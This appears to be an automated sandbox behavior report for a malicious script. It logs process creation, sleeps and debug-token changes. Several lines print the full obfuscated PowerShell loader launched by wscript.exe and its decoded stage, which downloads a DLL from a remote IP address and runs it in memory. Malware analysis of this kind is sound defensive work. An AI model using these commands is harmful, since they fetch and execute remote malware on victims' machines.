Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J??Bw??Ek??QwB3??HY??I????9??C????Jw??l??G8??YgB6??GU??cQB1??Gk??bw??l??Cc??OwBb??EI??eQB0??GU??WwBd??F0??I????k??EQ??T??BM??C????PQ??g??Fs??UwB5??HM??d??Bl??G0??LgBD??G8??bgB2??GU??cgB0??F0??Og??6??EY??cgBv??G0??QgBh??HM??ZQ??2??DQ??UwB0??HI??aQBu??Gc??K????o??E4??ZQB3??C0??TwBi??Go??ZQBj??HQ??I??BO??GU??d????u??Fc??ZQBi??EM??b??Bp??GU??bgB0??Ck??LgBE??G8??dwBu??Gw??bwBh??GQ??UwB0??HI??aQBu??Gc??K????n??Gg??d??B0??H????Og??v??C8??Mg??w??C4??Nw??u??DE??N????u??Dk??OQ??v??HM??ZQBy??HY??ZQBy??C8??Z??Bs??Gw??LgB0??Hg??d????n??Ck??KQ??7??Fs??UwB5??HM??d??Bl??G0??LgBB??H????c??BE??G8??bQBh??Gk??bgBd??Do??OgBD??HU??cgBy??GU??bgB0??EQ??bwBt??GE??aQBu??C4??T??Bv??GE??Z????o??CQ??R??BM??Ew??KQ??u??Ec??ZQB0??FQ??eQBw??GU??K????n??EM??b??Bh??HM??cwBM??Gk??YgBy??GE??cgB5??DM??LgBD??Gw??YQBz??HM??MQ??n??Ck??LgBH??GU??d??BN??GU??d??Bo??G8??Z????o??Cc??UgB1??G4??Jw??p??C4??SQBu??HY??bwBr??GU??K????k??G4??dQBs??Gw??L????g??Fs??bwBi??Go??ZQBj??HQ??WwBd??F0??I????o??Cc??d??B4??HQ??LgBm??GM??Yw??v??DI??Mg??y??C4??Mw??3??C4??NQ??y??DI??Lg??1??Dg??MQ??v??C8??OgBw??HQ??d??Bo??Cc??KQ??p????==';$VXdfe = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('??','A') ) ).replace('%mtIUbZgQec%','');powershell.exe -Command $VXdfe Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$pICwv = '%obzequio%';[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://20.7.14.99/server/dll.txt'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ClassLibrary3.Class1').GetMethod('Run').Invoke($null, [object[]] ('txt.fcc/222.37.522.581//:ptth')) Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FF816455F74 push ss; ret 3_2_00007FF816455F77
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3639 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9623 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5148 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 724 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5656 Thread sleep count: 9623 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5244 Thread sleep time: -5534023222112862s >= -30000s Jump to behavior
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: powershell.exe, 00000003.00000003.315447170.000001B0AB0F6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.344023748.000001B0AB104000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'j??bw??ek??qwb3??hy??i????9??c????jw??l??g8??ygb6??gu??cqb1??gk??bw??l??cc??owbb??ei??eqb0??gu??wwbd??f0??i????k??eq??t??bm??c????pq??g??fs??uwb5??hm??d??bl??g0??lgbd??g8??bgb2??gu??cgb0??f0??og??6??ey??cgbv??g0??qgbh??hm??zq??2??dq??uwb0??hi??aqbu??gc??k????o??e4??zqb3??c0??twbi??go??zqbj??hq??i??bo??gu??d????u??fc??zqbi??em??b??bp??gu??bgb0??ck??lgbe??g8??dwbu??gw??bwbh??gq??uwb0??hi??aqbu??gc??k????n??gg??d??b0??h????og??v??c8??mg??w??c4??nw??u??de??n????u??dk??oq??v??hm??zqby??hy??zqby??c8??z??bs??gw??lgb0??hg??d????n??ck??kq??7??fs??uwb5??hm??d??bl??g0??lgbb??h????c??be??g8??bqbh??gk??bgbd??do??ogbd??hu??cgby??gu??bgb0??eq??bwbt??ge??aqbu??c4??t??bv??ge??z????o??cq??r??bm??ew??kq??u??ec??zqb0??fq??eqbw??gu??k????n??em??b??bh??hm??cwbm??gk??ygby??ge??cgb5??dm??lgbd??gw??yqbz??hm??mq??n??ck??lgbh??gu??d??bn??gu??d??bo??g8??z????o??cc??ugb1??g4??jw??p??c4??sqbu??hy??bwbr??gu??k????k??g4??dqbs??gw??l????g??fs??bwbi??go??zqbj??hq??wwbd??f0??i????o??cc??d??b4??hq??lgbm??gm??yw??v??di??mg??y??c4??mw??3??c4??nq??y??di??lg??1??dg??mq??v??c8??ogbw??hq??d??bo??cc??kq??p????==';$vxdfe = [system.text.encoding]::unicode.getstring( [system.convert]::frombase64string( $codigo.replace('??','a') ) ).replace('%mtiubzgqec%','');powershell.exe -command $vxdfe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "$picwv = '%obzequio%';[byte[]] $dll = [system.convert]::frombase64string((new-object net.webclient).downloadstring('http://20.7.14.99/server/dll.txt'));[system.appdomain]::currentdomain.load($dll).gettype('classlibrary3.class1').getmethod('run').invoke($null, [object[]] ('txt.fcc/222.37.522.581//:ptth'))
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'j??bw??ek??qwb3??hy??i????9??c????jw??l??g8??ygb6??gu??cqb1??gk??bw??l??cc??owbb??ei??eqb0??gu??wwbd??f0??i????k??eq??t??bm??c????pq??g??fs??uwb5??hm??d??bl??g0??lgbd??g8??bgb2??gu??cgb0??f0??og??6??ey??cgbv??g0??qgbh??hm??zq??2??dq??uwb0??hi??aqbu??gc??k????o??e4??zqb3??c0??twbi??go??zqbj??hq??i??bo??gu??d????u??fc??zqbi??em??b??bp??gu??bgb0??ck??lgbe??g8??dwbu??gw??bwbh??gq??uwb0??hi??aqbu??gc??k????n??gg??d??b0??h????og??v??c8??mg??w??c4??nw??u??de??n????u??dk??oq??v??hm??zqby??hy??zqby??c8??z??bs??gw??lgb0??hg??d????n??ck??kq??7??fs??uwb5??hm??d??bl??g0??lgbb??h????c??be??g8??bqbh??gk??bgbd??do??ogbd??hu??cgby??gu??bgb0??eq??bwbt??ge??aqbu??c4??t??bv??ge??z????o??cq??r??bm??ew??kq??u??ec??zqb0??fq??eqbw??gu??k????n??em??b??bh??hm??cwbm??gk??ygby??ge??cgb5??dm??lgbd??gw??yqbz??hm??mq??n??ck??lgbh??gu??d??bn??gu??d??bo??g8??z????o??cc??ugb1??g4??jw??p??c4??sqbu??hy??bwbr??gu??k????k??g4??dqbs??gw??l????g??fs??bwbi??go??zqbj??hq??wwbd??f0??i????o??cc??d??b4??hq??lgbm??gm??yw??v??di??mg??y??c4??mw??3??c4??nq??y??di??lg??1??dg??mq??v??c8??ogbw??hq??d??bo??cc??kq??p????==';$vxdfe = [system.text.encoding]::unicode.getstring( [system.convert]::frombase64string( $codigo.replace('??','a') ) ).replace('%mtiubzgqec%','');powershell.exe -command $vxdfe Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "$picwv = '%obzequio%';[byte[]] $dll = [system.convert]::frombase64string((new-object net.webclient).downloadstring('http://20.7.14.99/server/dll.txt'));[system.appdomain]::currentdomain.load($dll).gettype('classlibrary3.class1').getmethod('run').invoke($null, [object[]] ('txt.fcc/222.37.522.581//:ptth')) Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J??Bw??Ek??QwB3??HY??I????9??C????Jw??l??G8??YgB6??GU??cQB1??Gk??bw??l??Cc??OwBb??EI??eQB0??GU??WwBd??F0??I????k??EQ??T??BM??C????PQ??g??Fs??UwB5??HM??d??Bl??G0??LgBD??G8??bgB2??GU??cgB0??F0??Og??6??EY??cgBv??G0??QgBh??HM??ZQ??2??DQ??UwB0??HI??aQBu??Gc??K????o??E4??ZQB3??C0??TwBi??Go??ZQBj??HQ??I??BO??GU??d????u??Fc??ZQBi??EM??b??Bp??GU??bgB0??Ck??LgBE??G8??dwBu??Gw??bwBh??GQ??UwB0??HI??aQBu??Gc??K????n??Gg??d??B0??H????Og??v??C8??Mg??w??C4??Nw??u??DE??N????u??Dk??OQ??v??HM??ZQBy??HY??ZQBy??C8??Z??Bs??Gw??LgB0??Hg??d????n??Ck??KQ??7??Fs??UwB5??HM??d??Bl??G0??LgBB??H????c??BE??G8??bQBh??Gk??bgBd??Do??OgBD??HU??cgBy??GU??bgB0??EQ??bwBt??GE??aQBu??C4??T??Bv??GE??Z????o??CQ??R??BM??Ew??KQ??u??Ec??ZQB0??FQ??eQBw??GU??K????n??EM??b??Bh??HM??cwBM??Gk??YgBy??GE??cgB5??DM??LgBD??Gw??YQBz??HM??MQ??n??Ck??LgBH??GU??d??BN??GU??d??Bo??G8??Z????o??Cc??UgB1??G4??Jw??p??C4??SQBu??HY??bwBr??GU??K????k??G4??dQBs??Gw??L????g??Fs??bwBi??Go??ZQBj??HQ??WwBd??F0??I????o??Cc??d??B4??HQ??LgBm??GM??Yw??v??DI??Mg??y??C4??Mw??3??C4??NQ??y??DI??Lg??1??Dg??MQ??v??C8??OgBw??HQ??d??Bo??Cc??KQ??p????==';$VXdfe = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('??','A') ) ).replace('%mtIUbZgQec%','');powershell.exe -Command $VXdfe Jump to behavior
